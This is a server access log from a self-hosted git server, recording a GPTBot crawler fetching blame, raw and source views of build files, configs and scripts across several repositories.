+[17/Feb/2026:16:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10707] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10708] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10707] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11532] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" +[17/Feb/2026:16:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10708] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10709] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11272] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:16:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21061] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21063] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11272] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11315] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9905] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10677] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:16:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11270] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21061] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21354] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21063] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11317] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11270] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:16:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:09:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11918] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13024] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" +[17/Feb/2026:16:09:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" +[17/Feb/2026:16:09:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13016] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" +[17/Feb/2026:16:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11912] [Gzip 3.33] [Sent-to 192.168.0.250] 